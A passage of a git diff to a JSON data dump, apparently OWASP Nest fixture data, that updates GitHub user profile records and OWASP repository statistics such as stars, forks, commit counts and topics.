"location": "Santiago, Chile", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 30, + "followers_count": 34, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2015-03-09T13:24:45Z", - "updated_at": "2024-09-16T14:46:08Z", - "node_id": "MDQ6VXNlcjExMzkwNDk1", - "bio": "", + "public_repositories_count": 15, + "created_at": "2010-02-07T09:22:20Z", + "updated_at": "2024-09-18T17:24:28Z", + "node_id": "MDQ6VXNlcjE5ODg2OQ==", + "bio": "Software engineer with a strong background in cybersecurity and networking.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3249, + "pk": 8661, "fields": { - "nest_created_at": "2024-09-17T17:17:13.372Z", - "nest_updated_at": "2024-09-17T17:17:13.372Z", - "name": "Meghan Jacquot", - "login": "meghanjacquot", + "nest_created_at": "2024-09-22T10:46:30.056Z", + "nest_updated_at": "2024-09-22T20:31:39.138Z", + "name": "Andrew Ayer", + "login": "AGWA", + "email": "agwa@andrewayer.name", + "avatar_url": "https://avatars.githubusercontent.com/u/321605?v=4", + "company": "@SSLMate", + "location": "Boston", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 326, + "public_gists_count": 16, + "public_repositories_count": 20, + "created_at": "2010-07-03T01:46:33Z", + "updated_at": "2024-06-28T19:10:56Z", + "node_id": "MDQ6VXNlcjMyMTYwNQ==", + "bio": "Bootstrapped founder @SSLMate, where I make SSL certificates easier and do WebPKI and Certificate Transparency stuff.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 8662, + "fields": { + "nest_created_at": "2024-09-22T10:46:30.372Z", + "nest_updated_at": "2024-09-22T20:31:39.454Z", + "name": "Ian Foster", + "login": "lanrat", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/65329458?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/164192?v=4", + "company": "/dev/null", + "location": "", + "collaborators_count": 0, + "following_count": 460, + "followers_count": 213, + "public_gists_count": 57, + "public_repositories_count": 116, + "created_at": "2009-12-08T04:10:19Z", + "updated_at": "2024-09-12T15:13:20Z", + "node_id": "MDQ6VXNlcjE2NDE5Mg==", + "bio": "Researcher, Hacker, Programmer, Geek", + "is_hireable": true, + "twitter_username": "lanrat" + } +}, +{ + "model": "github.user", + "pk": 8663, + "fields": { + "nest_created_at": "2024-09-22T10:46:30.731Z", + "nest_updated_at": "2024-09-22T20:31:39.772Z", + "name": "Faidon Liambotis", + "login": "paravoid", + "email": "paravoid@debian.org", + "avatar_url": "https://avatars.githubusercontent.com/u/1330796?v=4", "company": "", - "location": "East Coast, United States of America", + "location": "Athens, Greece", "collaborators_count": 0, - "following_count": 20, - "followers_count": 22, + "following_count": 1, + "followers_count": 58, "public_gists_count": 0, - "public_repositories_count": 9, - "created_at": "2020-05-14T05:32:02Z", - "updated_at": "2024-08-30T02:42:47Z", - "node_id": "MDQ6VXNlcjY1MzI5NDU4", - "bio": "Curious & creative: A security engineer - I love debugging code as I problem solve. I'm passionate about fairness in ML. These are past projects.", - "is_hireable": true, + "public_repositories_count": 54, + "created_at": "2012-01-14T22:55:13Z", + "updated_at": "2024-08-14T20:10:40Z", + "node_id": "MDQ6VXNlcjEzMzA3OTY=", + "bio": "@Debian, etc. Formerly: SRE @Wikimedia, Board @OpenSourceOrg. Opinions are my own.", + "is_hireable": false, + "twitter_username": "faidonl" + } +}, +{ + "model": "github.user", + "pk": 8664, + "fields": { + "nest_created_at": "2024-09-22T10:46:31.044Z", + "nest_updated_at": "2024-09-22T20:31:40.089Z", + "name": "Jonathan Rudenberg", + "login": "titanous", + "email": "jonathan@titanous.com", + "avatar_url": "https://avatars.githubusercontent.com/u/13026?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 25, + "followers_count": 710, + "public_gists_count": 63, + "public_repositories_count": 271, + "created_at": "2008-06-08T23:38:34Z", + "updated_at": "2024-08-13T16:28:04Z", + "node_id": "MDQ6VXNlcjEzMDI2", + "bio": "memory safety is not optional", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3250, + "pk": 8665, "fields": { - "nest_created_at": "2024-09-18T00:15:09.066Z", - "nest_updated_at": "2024-09-18T19:03:50.805Z", - "name": "", - "login": "AndreasIgelCC", + "nest_created_at": "2024-09-22T10:46:31.356Z", + "nest_updated_at": "2024-09-22T20:31:40.398Z", + "name": "Daniel Peukert", + "login": "dpeukert", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/2921976?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3451904?v=4", + "company": "@czechtv", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2012-11-29T14:01:33Z", - "updated_at": "2024-01-11T10:44:26Z", - "node_id": "MDQ6VXNlcjI5MjE5NzY=", - "bio": "", + "following_count": 2, + "followers_count": 24, + "public_gists_count": 1, + "public_repositories_count": 4, + "created_at": "2013-02-01T19:57:39Z", + "updated_at": "2024-07-24T13:43:03Z", + "node_id": "MDQ6VXNlcjM0NTE5MDQ=", + "bio": "My projects are hosted over on GitLab (link below), this profile is only used for contributions to projects hosted on GitHub.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3251, + "pk": 8666, "fields": { - "nest_created_at": "2024-09-18T00:18:19.676Z", - "nest_updated_at": "2024-09-18T00:18:19.676Z", - "name": "Vladimir Terzic", - "login": "algol68", - "email": "vlad@terzic.net", - "avatar_url": "https://avatars.githubusercontent.com/u/171199?v=4", + "nest_created_at": "2024-09-22T10:46:31.679Z", + "nest_updated_at": "2024-09-22T20:31:40.713Z", + "name": "Alex Gaynor", + "login": "alex", + "email": "alex.gaynor@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/772?v=4", "company": "", - "location": "Boise, Idaho USA", + "location": "Washington D.C.", "collaborators_count": 0, - "following_count": 0, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2009-12-23T01:07:39Z", - "updated_at": "2024-09-17T20:00:44Z", - "node_id": "MDQ6VXNlcjE3MTE5OQ==", - "bio": "", + "following_count": 38, + "followers_count": 9904, + "public_gists_count": 81, + "public_repositories_count": 468, + "created_at": "2008-02-24T20:44:41Z", + "updated_at": "2024-08-06T18:28:16Z", + "node_id": "MDQ6VXNlcjc3Mg==", + "bio": "I program computers, and build teams that program computers, with a heavy focus on security.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3252, + "pk": 8667, "fields": { - "nest_created_at": "2024-09-18T00:19:29.167Z", - "nest_updated_at": "2024-09-18T19:08:10.358Z", - "name": "Eric Nieuwland", - "login": "eric-nieuwland", - "email": "eric.nieuwland@ictu.nl", - "avatar_url": "https://avatars.githubusercontent.com/u/10603975?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T10:46:32.334Z", + "nest_updated_at": "2024-09-22T20:31:41.351Z", + "name": "Joe Tsai", + "login": "dsnet", + "email": "joetsai@digital-static.net", + "avatar_url": "https://avatars.githubusercontent.com/u/6354026?v=4", + "company": "@tailscale", + "location": "Santa Clara", "collaborators_count": 0, - "following_count": 1, - "followers_count": 3, - "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2015-01-19T20:54:32Z", - "updated_at": "2024-08-12T11:53:05Z", - "node_id": "MDQ6VXNlcjEwNjAzOTc1", + "following_count": 47, + "followers_count": 1227, + "public_gists_count": 2, + "public_repositories_count": 27, + "created_at": "2014-01-08T22:53:45Z", + "updated_at": "2024-08-08T20:30:01Z", + "node_id": "MDQ6VXNlcjYzNTQwMjY=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -441553,24 +702602,24 @@ }, { "model": "github.user", - "pk": 3253, + "pk": 8668, "fields": { - "nest_created_at": "2024-09-18T17:40:07.424Z", - "nest_updated_at": "2024-09-18T19:02:16.927Z", - "name": "Filippos Fotopoulos", - "login": "filipposfwt", - "email": "filfwt@hotmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/16762331?v=4", + "nest_created_at": "2024-09-22T10:46:32.648Z", + "nest_updated_at": "2024-09-22T20:31:41.673Z", + "name": "chayleaf", + "login": "chayleaf", + "email": "chayleaf-git@pavluk.org", + "avatar_url": "https://avatars.githubusercontent.com/u/9590981?v=4", "company": "", - "location": "Athens, Greece", + "location": "Russia", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2016-01-18T16:14:41Z", - "updated_at": "2024-09-18T09:41:16Z", - "node_id": "MDQ6VXNlcjE2NzYyMzMx", + "following_count": 11, + "followers_count": 59, + "public_gists_count": 15, + "public_repositories_count": 96, + "created_at": "2014-11-06T13:21:51Z", + "updated_at": "2024-03-10T02:59:43Z", + "node_id": "MDQ6VXNlcjk1OTA5ODE=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -441578,24 +702627,24 @@ }, { "model": "github.user", - "pk": 3254, + "pk": 8669, "fields": { - "nest_created_at": "2024-09-18T18:14:57.709Z", - "nest_updated_at": "2024-09-18T19:10:38.717Z", - "name": "", - "login": "c0nd3v", + "nest_created_at": "2024-09-22T10:46:32.970Z", + "nest_updated_at": "2024-09-22T20:31:41.981Z", + "name": "Martin Stone", + "login": "d7415", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/32241825?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1611702?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 5, - "followers_count": 13, + "following_count": 4, + "followers_count": 11, "public_gists_count": 1, - "public_repositories_count": 2, - "created_at": "2017-09-24T13:54:02Z", - "updated_at": "2024-09-15T14:11:02Z", - "node_id": "MDQ6VXNlcjMyMjQxODI1", + "public_repositories_count": 36, + "created_at": "2012-04-04T12:56:38Z", + "updated_at": "2024-08-16T09:14:17Z", + "node_id": "MDQ6VXNlcjE2MTE3MDI=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -441603,24 +702652,24 @@ }, { "model": "github.user", - "pk": 3255, + "pk": 8670, "fields": { - "nest_created_at": "2024-09-18T18:56:38.193Z", - "nest_updated_at": "2024-09-18T18:56:38.193Z", - "name": "", - "login": "MarioAllegro", + "nest_created_at": "2024-09-22T10:46:56.440Z", + "nest_updated_at": "2024-09-22T20:32:05.409Z", + "name": "Eric Rutz", + "login": "lonefoxzero", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/39234782?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/124001469?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 5, - "followers_count": 6, + "following_count": 1, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 13, - "created_at": "2018-05-13T08:49:01Z", - "updated_at": "2024-09-18T18:50:44Z", - "node_id": "MDQ6VXNlcjM5MjM0Nzgy", + "public_repositories_count": 2, + "created_at": "2023-01-30T22:12:08Z", + "updated_at": "2023-08-03T21:19:17Z", + "node_id": "U_kgDOB2QcvQ", "bio": "", "is_hireable": false, "twitter_username": "" @@ -441628,77 +702677,77 @@ }, { "model": "github.user", - "pk": 3256, + "pk": 8671, "fields": { - "nest_created_at": "2024-09-18T18:58:00.059Z", - "nest_updated_at": "2024-09-18T18:58:00.059Z", - "name": "Josh Jennings", - "login": "SOOS-JJennings", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/88005582?v=4", - "company": "SOOS", - "location": "Winooski, VT", + "nest_created_at": "2024-09-22T10:46:57.115Z", + "nest_updated_at": "2024-09-22T20:32:06.032Z", + "name": "Paolo Fabio Zaino", + "login": "pzaino", + "email": "p.zaino@zfpsystems.com", + "avatar_url": "https://avatars.githubusercontent.com/u/8824337?v=4", + "company": "Personal Profile", + "location": "Planet Earth", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 24, + "followers_count": 27, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2021-07-26T21:11:41Z", - "updated_at": "2024-07-22T13:55:21Z", - "node_id": "MDQ6VXNlcjg4MDA1NTgy", - "bio": "", + "public_repositories_count": 37, + "created_at": "2014-09-18T18:59:40Z", + "updated_at": "2024-08-19T17:28:51Z", + "node_id": "MDQ6VXNlcjg4MjQzMzc=", + "bio": "Senior Principal Software Engineer, focused on R&D. \r\nI mostly enjoy Open Source Software and Linux/BSD OS as well as RISC OS, Amiga OS and TOS", "is_hireable": false, - "twitter_username": "" + "twitter_username": "PaoloFabioZaino" } }, { "model": "github.user", - "pk": 3257, + "pk": 8672, "fields": { - "nest_created_at": "2024-09-18T19:03:22.852Z", - "nest_updated_at": "2024-09-18T19:03:22.852Z", - "name": "Simon Sperling", - "login": "Reduxx", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1726223?v=4", + "nest_created_at": "2024-09-22T10:46:57.433Z", + "nest_updated_at": "2024-09-22T20:32:06.354Z", + "name": "thewisenerd", + "login": "thewisenerd", + "email": "thewisenerd@protonmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2658885?v=4", "company": "", - "location": "Germany", + "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2012-05-10T11:06:09Z", - "updated_at": "2024-05-14T10:21:18Z", - "node_id": "MDQ6VXNlcjE3MjYyMjM=", + "following_count": 1, + "followers_count": 44, + "public_gists_count": 63, + "public_repositories_count": 120, + "created_at": "2012-10-26T17:37:39Z", + "updated_at": "2024-08-30T03:37:05Z", + "node_id": "MDQ6VXNlcjI2NTg4ODU=", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "thewisenerdXDA" } }, { "model": "github.user", - "pk": 3258, + "pk": 8683, "fields": { - "nest_created_at": "2024-09-18T19:07:03.282Z", - "nest_updated_at": "2024-09-18T19:07:03.282Z", - "name": "Maureen", - "login": "maur1", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5443905?v=4", - "company": "Boitano", - "location": "Oslo", + "nest_created_at": "2024-09-22T19:27:52.490Z", + "nest_updated_at": "2024-09-22T19:27:52.490Z", + "name": "Chia Wei Han", + "login": "weihan1394", + "email": "weihan1394@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/7189650?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 20, - "created_at": "2013-09-12T12:19:33Z", - "updated_at": "2024-08-22T11:31:32Z", - "node_id": "MDQ6VXNlcjU0NDM5MDU=", - "bio": "", + "following_count": 2, + "followers_count": 2, + "public_gists_count": 2, + "public_repositories_count": 24, + "created_at": "2014-04-05T14:39:01Z", + "updated_at": "2024-08-22T07:56:33Z", + "node_id": "MDQ6VXNlcjcxODk2NTA=", + "bio": "DevOps Engineer", "is_hireable": false, - "twitter_username": "" + "twitter_username": "weihan1394" } }, { @@ -452221,25 +713270,42 @@ "Arkadii Yakovets", "Starr Brown" ], - "related_urls": [], + "related_urls": [ + "https://github.com/owasp/nest" + ], "invalid_urls": [], - "commits_count": 14, - "contributors_count": 2, - "forks_count": 0, - "open_issues_count": 0, + "commits_count": 83, + "contributors_count": 3, + "forks_count": 3, + "open_issues_count": 2, "releases_count": 0, - "stars_count": 0, + "stars_count": 4, "subscribers_count": 3, - "watchers_count": 0, - "languages": [], + "watchers_count": 4, + "languages": [ + "Makefile", + "Python" + ], "licenses": [ + "MIT License", "Other" ], - "topics": [], + "topics": [ + "api", + "chapters", + "committees", + "events", + "metadata", + "nest", + "owasp", + "projects", + "rest", + "taxonomy" + ], "created_at": "2024-08-03T22:00:32Z", "released_at": null, - "pushed_at": "2024-09-06T18:49:30Z", - "updated_at": "2024-09-06T18:49:30Z", + "pushed_at": "2024-09-22T02:37:29Z", + "updated_at": "2024-09-22T02:37:29Z", "owasp_repository": 5, "organizations": [ 1 @@ -452248,6 +713314,7 @@ 1 ], "repositories": [ + 2, 5 ] } @@ -452509,12 +713576,12 @@ "invalid_urls": [], "commits_count": 21, "contributors_count": 3, - "forks_count": 11, + "forks_count": 13, "open_issues_count": 0, "releases_count": 0, - "stars_count": 45, + "stars_count": 46, "subscribers_count": 2, - "watchers_count": 45, + "watchers_count": 46, "languages": [ "Dockerfile", "Python" @@ -452750,11 +713817,11 @@ "commits_count": 1082, "contributors_count": 6, "forks_count": 41, - "open_issues_count": 16, + "open_issues_count": 12, "releases_count": 33, - "stars_count": 555, + "stars_count": 556, "subscribers_count": 11, - "watchers_count": 555, + "watchers_count": 556, "languages": [ "Crystal", "Dockerfile", @@ -452782,8 +713849,8 @@ ], "created_at": "2024-06-13T13:50:25Z", "released_at": "2024-08-01T14:23:22Z", - "pushed_at": "2024-09-18T15:22:10Z", - "updated_at": "2024-09-18T15:22:10Z", + "pushed_at": "2024-09-22T07:27:08Z", + "updated_at": "2024-09-22T07:27:08Z", "owasp_repository": 26, "organizations": [ 3, @@ -452992,7 +714059,7 @@ ], "related_urls": [], "invalid_urls": [], - "commits_count": 29, + "commits_count": 30, "contributors_count": 3, "forks_count": 1, "open_issues_count": 0, @@ -453007,8 +714074,8 @@ "topics": [], "created_at": "2024-03-14T14:00:25Z", "released_at": null, - "pushed_at": "2024-09-14T21:53:47Z", - "updated_at": "2024-09-14T21:53:47Z", + "pushed_at": "2024-09-20T06:25:46Z", + "updated_at": "2024-09-20T06:25:46Z", "owasp_repository": 48, "organizations": [ 1 @@ -453403,7 +714470,7 @@ "key": "www-project-flawfix", "description": "A usable central vulnerability management system for developers and security teams.", "summary": "OWASP FlawFix is an open-source project designed as a vulnerability management system for developers and security teams. It helps organizations effectively identify and fix software vulnerabilities, especially in fast-paced environments that use DevOps practices. The system is user-friendly, making it easy for anyone, even with limited tech skills, to adopt. FlawFix integrates security directly into the development process and focuses on protecting sensitive data through advanced security measures. Overall, it aims to improve the management of vulnerabilities while supporting quick software development.", - "is_active": true, + "is_active": false, "has_active_repositories": true, "level": "incubator", "level_raw": "2", @@ -453619,12 +714686,12 @@ "invalid_urls": [], "commits_count": 3520, "contributors_count": 85, - "forks_count": 1578, + "forks_count": 1579, "open_issues_count": 228, "releases_count": 31, - "stars_count": 8058, - "subscribers_count": 390, - "watchers_count": 8058, + "stars_count": 8071, + "subscribers_count": 389, + "watchers_count": 8071, "languages": [ "C++", "M4" @@ -454648,7 +715715,7 @@ ], "related_urls": [], "invalid_urls": [], - "commits_count": 66, + "commits_count": 71, "contributors_count": 3, "forks_count": 1, "open_issues_count": 0, @@ -454663,8 +715730,8 @@ "topics": [], "created_at": "2023-09-26T13:35:26Z", "released_at": null, - "pushed_at": "2024-09-06T17:01:20Z", - "updated_at": "2024-09-06T17:01:20Z", + "pushed_at": "2024-09-20T14:55:19Z", + "updated_at": "2024-09-20T14:55:19Z", "owasp_repository": 112, "organizations": [ 1 @@ -454822,8 +715889,8 @@ "invalid_urls": [], "commits_count": 689, "contributors_count": 9, - "forks_count": 7, - "open_issues_count": 17, + "forks_count": 6, + "open_issues_count": 16, "releases_count": 5, "stars_count": 57, "subscribers_count": 5, @@ -455050,11 +716117,11 @@ "commits_count": 367, "contributors_count": 14, "forks_count": 96, - "open_issues_count": 58, - "releases_count": 120, - "stars_count": 982, + "open_issues_count": 59, + "releases_count": 121, + "stars_count": 983, "subscribers_count": 18, - "watchers_count": 982, + "watchers_count": 983, "languages": [ "Dockerfile", "Python" @@ -455081,9 +716148,9 @@ "vulnerability-scanners" ], "created_at": "2023-08-15T21:38:40Z", - "released_at": "2024-09-12T12:52:30Z", - "pushed_at": "2024-09-12T12:52:30Z", - "updated_at": "2024-09-12T12:52:30Z", + "released_at": "2024-09-22T18:08:00Z", + "pushed_at": "2024-09-22T18:08:00Z", + "updated_at": "2024-09-22T18:08:00Z", "owasp_repository": 128, "organizations": [ 9, @@ -455743,12 +716810,12 @@ "invalid_urls": [], "commits_count": 702, "contributors_count": 44, - "forks_count": 128, + "forks_count": 130, "open_issues_count": 30, "releases_count": 0, - "stars_count": 505, + "stars_count": 506, "subscribers_count": 79, - "watchers_count": 505, + "watchers_count": 506, "languages": [], "licenses": [ "Other" @@ -456478,12 +717545,12 @@ "invalid_urls": [], "commits_count": 102, "contributors_count": 6, - "forks_count": 11, + "forks_count": 12, "open_issues_count": 1, "releases_count": 0, - "stars_count": 22, + "stars_count": 24, "subscribers_count": 7, - "watchers_count": 22, + "watchers_count": 24, "languages": [], "licenses": [ "Other" @@ -456535,7 +717602,7 @@ "https://github.com/cervantessec/website" ], "invalid_urls": [], - "commits_count": 54, + "commits_count": 59, "contributors_count": 4, "forks_count": 41, "open_issues_count": 5, @@ -456581,8 +717648,8 @@ ], "created_at": "2023-02-12T18:30:08Z", "released_at": "2023-04-03T18:01:55Z", - "pushed_at": "2024-09-18T14:38:48Z", - "updated_at": "2024-09-18T14:38:48Z", + "pushed_at": "2024-09-20T17:45:15Z", + "updated_at": "2024-09-20T17:45:15Z", "owasp_repository": 185, "organizations": [ 11, @@ -456633,9 +717700,9 @@ "forks_count": 266, "open_issues_count": 2, "releases_count": 1, - "stars_count": 1683, + "stars_count": 1687, "subscribers_count": 44, - "watchers_count": 1683, + "watchers_count": 1687, "languages": [], "licenses": [ "Other" @@ -456702,7 +717769,7 @@ "invalid_urls": [], "commits_count": 50, "contributors_count": 3, - "forks_count": 20, + "forks_count": 19, "open_issues_count": 1, "releases_count": 4, "stars_count": 193, @@ -456935,12 +718002,12 @@ "invalid_urls": [], "commits_count": 665, "contributors_count": 13, - "forks_count": 63, - "open_issues_count": 3, + "forks_count": 64, + "open_issues_count": 4, "releases_count": 17, - "stars_count": 392, + "stars_count": 393, "subscribers_count": 12, - "watchers_count": 392, + "watchers_count": 393, "languages": [ "HCL", "Python", @@ -456964,8 +718031,8 @@ ], "created_at": "2022-11-14T15:30:38Z", "released_at": "2024-05-23T19:23:47Z", - "pushed_at": "2024-09-17T19:25:14Z", - "updated_at": "2024-09-17T19:25:14Z", + "pushed_at": "2024-09-22T15:15:24Z", + "updated_at": "2024-09-22T15:15:24Z", "owasp_repository": 209, "organizations": [ 12, @@ -457120,9 +718187,9 @@ "forks_count": 16, "open_issues_count": 7, "releases_count": 0, - "stars_count": 102, + "stars_count": 103, "subscribers_count": 8, - "watchers_count": 102, + "watchers_count": 103, "languages": [ "Python" ], @@ -457354,7 +718421,7 @@ "open_issues_count": 0, "releases_count": 0, "stars_count": 0, - "subscribers_count": 7, + "subscribers_count": 8, "watchers_count": 0, "languages": [], "licenses": [], @@ -457747,9 +718814,9 @@ "forks_count": 86, "open_issues_count": 5, "releases_count": 0, - "stars_count": 560, + "stars_count": 561, "subscribers_count": 36, - "watchers_count": 560, + "watchers_count": 561, "languages": [], "licenses": [ "Other" @@ -458068,12 +719135,12 @@ "invalid_urls": [], "commits_count": 940, "contributors_count": 29, - "forks_count": 211, - "open_issues_count": 76, + "forks_count": 212, + "open_issues_count": 77, "releases_count": 33, - "stars_count": 2143, + "stars_count": 2147, "subscribers_count": 34, - "watchers_count": 2143, + "watchers_count": 2147, "languages": [ "Go" ], @@ -458363,9 +719430,9 @@ "forks_count": 36, "open_issues_count": 20, "releases_count": 4, - "stars_count": 224, + "stars_count": 223, "subscribers_count": 12, - "watchers_count": 224, + "watchers_count": 223, "languages": [ "Batchfile", "Dockerfile", @@ -458457,9 +719524,9 @@ "forks_count": 406, "open_issues_count": 1, "releases_count": 0, - "stars_count": 1241, + "stars_count": 1246, "subscribers_count": 49, - "watchers_count": 1241, + "watchers_count": 1246, "languages": [ "Dockerfile", "JavaScript", @@ -458593,12 +719660,12 @@ "invalid_urls": [], "commits_count": 5080, "contributors_count": 36, - "forks_count": 339, - "open_issues_count": 29, + "forks_count": 341, + "open_issues_count": 30, "releases_count": 79, - "stars_count": 1203, + "stars_count": 1205, "subscribers_count": 18, - "watchers_count": 1203, + "watchers_count": 1205, "languages": [ "C", "C#", @@ -459402,9 +720469,9 @@ "forks_count": 158, "open_issues_count": 317, "releases_count": 322, - "stars_count": 549, - "subscribers_count": 28, - "watchers_count": 549, + "stars_count": 554, + "subscribers_count": 27, + "watchers_count": 554, "languages": [ "ASP.NET", "C#", @@ -459542,9 +720609,9 @@ "yarn-plugin" ], "created_at": "2021-06-04T16:22:34Z", - "released_at": "2024-09-18T14:48:30Z", - "pushed_at": "2024-09-18T18:45:53Z", - "updated_at": "2024-09-18T18:45:53Z", + "released_at": "2024-09-20T08:25:04Z", + "pushed_at": "2024-09-22T16:47:04Z", + "updated_at": "2024-09-22T16:47:04Z", "owasp_repository": 369, "organizations": [ 16, @@ -459558,24 +720625,19 @@ 369, 1243, 1244, - 1255, - 1251, 1257, - 1258, - 1259, - 1261, 1248, 1250, + 1251, 1252, 1253, 1254, - 1256, + 1255, + 1258, + 1259, + 1261, 1260, - 1268, - 1269, - 1270, - 1271, - 1272, + 1256, 1273, 1274, 1263, @@ -459583,11 +720645,11 @@ 1265, 1266, 1267, - 1281, - 1282, - 1283, - 1284, - 1285, + 1268, + 1269, + 1270, + 1271, + 1272, 1286, 1287, 1276, @@ -459595,23 +720657,28 @@ 1278, 1279, 1280, - 1296, - 1288, - 1289, - 1290, - 1292, + 1281, + 1282, + 1283, + 1284, + 1285, 1293, - 1294, 1297, - 1295, 1299, + 1289, + 1290, + 1294, + 1288, 1291, - 1245, - 1246, + 1292, + 1295, + 1296, + 1249, 1262, 1275, + 1245, + 1246, 1247, - 1249, 1298 ] } @@ -459901,9 +720968,9 @@ "forks_count": 22, "open_issues_count": 0, "releases_count": 0, - "stars_count": 128, + "stars_count": 129, "subscribers_count": 6, - "watchers_count": 128, + "watchers_count": 129, "languages": [ "JavaScript" ], @@ -460662,8 +721729,8 @@ "updated_at": "2023-12-13T04:43:28Z", "owasp_repository": 407, "organizations": [ - 19, - 1 + 1, + 19 ], "owners": [ 1, @@ -460904,9 +721971,9 @@ "forks_count": 71, "open_issues_count": 3, "releases_count": 0, - "stars_count": 336, + "stars_count": 337, "subscribers_count": 16, - "watchers_count": 336, + "watchers_count": 337, "languages": [ "PHP" ], @@ -461093,12 +722160,12 @@ "invalid_urls": [], "commits_count": 262, "contributors_count": 21, - "forks_count": 334, + "forks_count": 335, "open_issues_count": 51, "releases_count": 15, - "stars_count": 1077, + "stars_count": 1080, "subscribers_count": 24, - "watchers_count": 1077, + "watchers_count": 1080, "languages": [ "Go", "Java", @@ -461835,12 +722902,12 @@ "invalid_urls": [], "commits_count": 961, "contributors_count": 34, - "forks_count": 525, + "forks_count": 526, "open_issues_count": 10, "releases_count": 10, - "stars_count": 2887, + "stars_count": 2892, "subscribers_count": 101, - "watchers_count": 2887, + "watchers_count": 2892, "languages": [ "Dockerfile", "Python", @@ -461877,8 +722944,8 @@ "updated_at": "2024-07-06T00:33:36Z", "owasp_repository": 460, "organizations": [ - 44, - 1 + 1, + 44 ], "owners": [ 1, @@ -461967,12 +723034,12 @@ "invalid_urls": [], "commits_count": 73, "contributors_count": 3, - "forks_count": 19, + "forks_count": 21, "open_issues_count": 1, "releases_count": 4, - "stars_count": 61, + "stars_count": 62, "subscribers_count": 4, - "watchers_count": 61, + "watchers_count": 62, "languages": [ "C#", "JavaScript" @@ -462854,7 +723921,7 @@ "invalid_urls": [], "commits_count": 204, "contributors_count": 24, - "forks_count": 191, + "forks_count": 192, "open_issues_count": 11, "releases_count": 0, "stars_count": 828, @@ -462918,9 +723985,9 @@ "forks_count": 9, "open_issues_count": 6, "releases_count": 0, - "stars_count": 16, + "stars_count": 17, "subscribers_count": 8, - "watchers_count": 16, + "watchers_count": 17, "languages": [], "licenses": [ "Other" @@ -463166,8 +724233,8 @@ "updated_at": "2024-09-06T15:29:39Z", "owasp_repository": 531, "organizations": [ - 45, - 1 + 1, + 45 ], "owners": [ 1, @@ -463208,12 +724275,12 @@ "invalid_urls": [], "commits_count": 663, "contributors_count": 23, - "forks_count": 750, + "forks_count": 749, "open_issues_count": 13, "releases_count": 6, - "stars_count": 211, + "stars_count": 213, "subscribers_count": 7, - "watchers_count": 211, + "watchers_count": 213, "languages": [ "JavaScript", "Jupyter Notebook", @@ -463475,12 +724542,12 @@ "invalid_urls": [], "commits_count": 987, "contributors_count": 42, - "forks_count": 383, + "forks_count": 380, "open_issues_count": 77, "releases_count": 13, - "stars_count": 288, + "stars_count": 289, "subscribers_count": 10, - "watchers_count": 288, + "watchers_count": 289, "languages": [ "Java", "JavaScript" @@ -463759,7 +724826,7 @@ ], "related_urls": [], "invalid_urls": [], - "commits_count": 721, + "commits_count": 722, "contributors_count": 14, "forks_count": 17, "open_issues_count": 7, @@ -463777,8 +724844,8 @@ ], "created_at": "2020-01-26T17:45:08Z", "released_at": null, - "pushed_at": "2024-09-16T07:37:16Z", - "updated_at": "2024-09-16T07:37:16Z", + "pushed_at": "2024-09-19T18:15:25Z", + "updated_at": "2024-09-19T18:15:25Z", "owasp_repository": 563, "organizations": [ 1 @@ -463925,14 +724992,14 @@ "https://github.com/nahsra/antisamy" ], "invalid_urls": [], - "commits_count": 816, + "commits_count": 817, "contributors_count": 17, "forks_count": 89, "open_issues_count": 16, "releases_count": 23, - "stars_count": 186, + "stars_count": 187, "subscribers_count": 14, - "watchers_count": 186, + "watchers_count": 187, "languages": [ "DIGITAL Command Language", "Java", @@ -463951,8 +725018,8 @@ ], "created_at": "2019-12-27T17:12:15Z", "released_at": "2024-07-06T14:35:25Z", - "pushed_at": "2024-09-16T18:00:55Z", - "updated_at": "2024-09-16T18:00:55Z", + "pushed_at": "2024-09-20T14:24:24Z", + "updated_at": "2024-09-20T14:24:24Z", "owasp_repository": 572, "organizations": [ 1 @@ -464125,8 +725192,8 @@ ], "created_at": "2019-11-19T21:10:20Z", "released_at": null, - "pushed_at": 